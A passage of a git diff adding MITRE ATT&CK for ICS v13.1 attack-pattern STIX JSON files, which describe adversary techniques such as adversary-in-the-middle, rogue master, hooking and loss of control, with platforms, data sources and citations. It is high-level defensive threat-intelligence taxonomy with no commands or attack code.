"https://attack.mitre.org/techniques/T0806", + "external_id": "T0806" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--94f042ae-3033-4a8d-9ec3-26396533a541.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--94f042ae-3033-4a8d-9ec3-26396533a541.json new file mode 100644 index 0000000000000000000000000000000000000000..2dfd5a08a0108628e48bddf7230a6402f376835e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--94f042ae-3033-4a8d-9ec3-26396533a541.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--b8f0d777-2c46-4ca4-889c-5a6c2bfb4dce", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Detect Program State", + "description": "Adversaries may seek to gather information about the current state of a program on a PLC. State information reveals information about the program, including whether it's running, halted, stopped, or has generated an exception. This information may be leveraged as a verification of malicious program execution or to determine if a PLC is ready to download a new program.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--94f042ae-3033-4a8d-9ec3-26396533a541", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0870", + "external_id": "T0870" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b.json new file mode 100644 index 0000000000000000000000000000000000000000..68f7edaa69634f012e7768394450a66c66bab954 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b.json @@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--e94c0411-193f-4125-9eca-bdf4137bd992", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Adversary-in-the-Middle", + "description": "Adversaries with privileged network access may seek to modify network traffic in real time using adversary-in-the-middle (AiTM) attacks. (Citation: Gabriel Sanchez October 2017) This type of attack allows the adversary to intercept traffic to and/or from a particular device on the network. If a AiTM attack is established, then the adversary has the ability to block, log, modify, or inject traffic into the communication stream. There are several ways to accomplish this attack, but some of the most-common are Address Resolution Protocol (ARP) poisoning and the use of a proxy. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) \n\nAn AiTM attack may allow an adversary to perform the following attacks: \n[Block Reporting Message](https://attack.mitre.org/techniques/T0804), [Spoof Reporting Message](https://attack.mitre.org/techniques/T0856), [Modify Parameter](https://attack.mitre.org/techniques/T0836), [Unauthorized Command Message](https://attack.mitre.org/techniques/T0855)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Conrad Layne - GE Digital" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Windows Registry: Windows Registry Key Modification", + "Service: Service Creation", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow", + "Process: Process Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0830", + "external_id": "T0830" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + }, + { + "source_name": "Gabriel Sanchez October 2017", + "description": "Gabriel Sanchez 2017, October Man-In-The-Middle Attack Against Modbus TCP Illustrated with Wireshark Retrieved. 2020/01/05 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/man-in-the-middle-attack-modbus-tcp-illustrated-wireshark-38095" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03.json new file mode 100644 index 0000000000000000000000000000000000000000..57dabfa7b41be05660fa1ab409d3c959a57772c4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--19652c3e-f3ae-4889-8ecb-5d3b79be5cb3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Exploitation for Evasion", + "description": "Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to evade detection. Vulnerabilities may exist in software that can be used to disable or circumvent security features. \n\nAdversaries may have prior knowledge through [Remote System Information Discovery](https://attack.mitre.org/techniques/T0888) about security features implemented on control devices. These device security features will likely be targeted directly for exploitation. There are examples of firmware RAM/ROM consistency checks on control devices being targeted by adversaries to enable the installation of malicious [System Firmware](https://attack.mitre.org/techniques/T0857).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0820", + "external_id": "T0820" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb.json new file mode 100644 index 0000000000000000000000000000000000000000..3ac08725596db6ec2841068b1ef657306e3632a9 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb.json @@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--853fdbb2-8d3f-4b90-a75c-ac8549b0e566", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of Control", + "description": "Adversaries may seek to achieve a sustained loss of control or a runaway condition in which operators cannot issue any commands even if the malicious interference has subsided. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)\n\nThe German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill in its 2014 IT Security Report.(Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact resulted in damage and unsafe conditions from the uncontrolled shutdown of a blast furnace.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0827", + "external_id": "T0827" + }, + { + "source_name": "BSI State of IT Security 2014", + "description": "Bundesamt fr Sicherheit in der Informationstechnik (BSI) (German Federal Office for Information Security) 2014 Die Lage der IT-Sicherheit in Deutschland 2014 (The State of IT Security in Germany) Retrieved. 2019/10/30 ", + "url": "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?__blob=publicationFile&v=3" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--a8cfd474-9358-464f-a169-9c6f099a8e8a.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--a8cfd474-9358-464f-a169-9c6f099a8e8a.json new file mode 100644 index 0000000000000000000000000000000000000000..1f050455bb68f3c27469831fcc04fb9535fad0f9 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--a8cfd474-9358-464f-a169-9c6f099a8e8a.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--02373bd0-2884-45ee-968c-1206cda5aab2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Change Program State", + "description": "Adversaries may attempt to change the state of the current program on a control device. Program state changes may be used to allow for another program to take over control or be loaded onto the device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--a8cfd474-9358-464f-a169-9c6f099a8e8a", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0875", + "external_id": "T0875" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae.json new file mode 100644 index 0000000000000000000000000000000000000000..93473ba7aceb33fa8a3e814d01f1b10a3c49f25a --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae.json @@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--16ee109f-a60c-4abb-8341-abf69cad8954", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-13T13:32:08.619Z", + "name": "Hooking", + "description": "Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for execution and privilege escalation means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. (Citation: Enterprise ATT&CK)\n\nOne type of hooking seen in ICS involves redirecting calls to these functions via import address table (IAT) hooking. IAT hooking uses modifications to a process IAT, where pointers to imported API functions are stored. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Engineering Workstation" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Process: Process Metadata", + "Process: OS API Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0874", + "external_id": "T0874" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Hooking Retrieved. 2019/10/27 ", + "url": "https://attack.mitre.org/techniques/T1179/" + }, + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--abb0a255-eb9c-48d0-8f5c-874bb84c0e45.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--abb0a255-eb9c-48d0-8f5c-874bb84c0e45.json new file mode 100644 index 0000000000000000000000000000000000000000..a0aff59be75056cf8a79bea17b2a58e64bf869d9 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--abb0a255-eb9c-48d0-8f5c-874bb84c0e45.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--64422d00-2f11-45e6-a901-02726445ba58", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Control Device Identification", + "description": "Adversaries may perform control device identification to determine the make and model of a target device. Management software and device APIs may be utilized by the adversary to gain this information. By identifying and obtaining device specifics, the adversary may be able to determine device vulnerabilities. This device information can also be used to understand device functionality and inform the decision to target the environment.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--abb0a255-eb9c-48d0-8f5c-874bb84c0e45", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0808", + "external_id": "T0808" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ae62fe1a-ea1a-479b-8dc0-65d250bd8bc7.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ae62fe1a-ea1a-479b-8dc0-65d250bd8bc7.json new file mode 100644 index 0000000000000000000000000000000000000000..9f28911a64eb6ea0fa9346ff56c136e41bfb1db5 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ae62fe1a-ea1a-479b-8dc0-65d250bd8bc7.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--6f0490d6-64a2-4552-b9fe-cdba1777d4ff", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Program Organization Units", + "description": "Program Organizational Units (POUs) are block structures used within PLC programming to create programs and projects. (Citation: Guidance - IEC61131) POUs can be used to hold user programs written in IEC 61131-3 languages: Structured text, Instruction list, Function block, and Ladder logic. (Citation: Guidance - IEC61131) Application - 201203 They can also provide additional functionality, such as establishing connections between the PLC and other devices using TCON. (Citation: PLCBlaster - Spenneberg)\n \nStuxnet uses a simple code-prepending infection technique to infect Organization Blocks (OB). For example, the following sequence of actions is performed when OB1 is infected (Citation: Stuxnet - Symantec - 201102):\n*Increase the size of the original block.\n*Write malicious code to the beginning of the block.\n*Insert the original OB1 code after the malicious code.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--ae62fe1a-ea1a-479b-8dc0-65d250bd8bc7", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0844", + "external_id": "T0844" + }, + { + "source_name": "Guidance - IEC61131", + "description": "John Karl-Heinz. (n.d.). Programming Industrial Automation Systems. Retrieved October 22, 2019.", + "url": "http://www.dee.ufrj.br/controle%20automatico/cursos/IEC61131-3%20Programming%20Industrial%20Automation%20Systems.pdf" + }, + { + "source_name": "PLCBlaster - Spenneberg", + "description": "Spenneberg, Ralf, Maik Br\u00fcggemann, and Hendrik Schwartke. (2016, March 31). Plc-blaster: A worm living solely in the plc.. Retrieved September 19, 2017.", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + }, + { + "source_name": "Stuxnet - Symantec - 201102", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier (Version 1.4). Retrieved September 22, 2017.", + "url": "https://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/w32%20stuxnet%20dossier.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf.json new file mode 100644 index 0000000000000000000000000000000000000000..ca6c6a08bd727934de528798234ff45a79e6b8e0 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--eaa0742b-7274-4d70-ada8-c75d470e9d2a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Graphical User Interface", + "description": "Adversaries may attempt to gain access to a machine via a Graphical User Interface (GUI) to enhance execution capabilities. Access to a GUI allows a user to interact with a computer in a more visual manner than a CLI. A GUI allows users to move a cursor and click on interface objects, with a mouse and keyboard as the main input devices, as opposed to just using the keyboard.\n\nIf physical access is not an option, then access might be possible via protocols such as VNC on Linux-based and Unix-based operating systems, and RDP on Windows operating systems. An adversary can use this access to execute programs and applications on the target machine.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Module: Module Load", + "Command: Command Execution", + "Logon Session: Logon Session Creation", + "Process: Process Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0823", + "external_id": "T0823" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb.json new file mode 100644 index 0000000000000000000000000000000000000000..5bd21308d19aa54febc8eb77c5ffdc4e74f63312 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--4bc222f7-bbc4-4fe5-b896-fc0b7048b535", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:18:41.277Z", + "name": "Rogue Master", + "description": "Adversaries may setup a rogue master to leverage control server functions to communicate with outstations. A rogue master can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master. Impersonating a master may also allow an adversary to avoid detection. \n\nIn the case of the 2017 Dallas Siren incident, adversaries used a rogue master to send command messages to the 156 distributed sirens across the city, either through a single rogue transmitter with a strong signal, or using many distributed repeaters. (Citation: Bastille April 2017) (Citation: Zack Whittaker April 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Engineering Workstation" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Asset: Asset Inventory" + ], + "type": "attack-pattern", + "id": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0848", + "external_id": "T0848" + }, + { + "source_name": "Bastille April 2017", + "description": "Bastille 2017, April 17 Dallas Siren Attack Retrieved. 2020/11/06 ", + "url": "https://www.bastille.net/blogs/2017/4/17/dallas-siren-attack" + }, + { + "source_name": "Zack Whittaker April 2017", + "description": "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06 ", + "url": "https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b52870cc-83f3-473c-b895-72d91751030b.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b52870cc-83f3-473c-b895-72d91751030b.json new file mode 100644 index 0000000000000000000000000000000000000000..6a50b791ca5099dca41628ddb7f49b19d638cfb4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b52870cc-83f3-473c-b895-72d91751030b.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--00606419-ba73-4949-8e2d-72f65e213000", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Native API", + "description": "Adversaries may directly interact with the native OS application programming interface (API) to access system functions. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. (Citation: The MITRE Corporation May 2017) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. \n\nFunctionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as memcpy and direct operations on memory registers can be used to modify user and system memory space.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Input/Output Server", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Process: OS API Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "created": "2021-04-13T12:36:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0834", + "external_id": "T0834" + }, + { + "source_name": "The MITRE Corporation May 2017", + "description": "The MITRE Corporation 2017, May 31 ATT&CK T1106: Native API Retrieved. 2021/04/26 ", + "url": "https://attack.mitre.org/techniques/T1106/" + } + ], + "object_marking_refs": [ + 